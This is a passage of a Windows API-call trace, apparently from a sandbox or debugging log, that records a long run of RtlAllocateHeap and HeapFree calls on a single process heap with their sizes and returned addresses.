0x2d277c0 [0174.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.503] 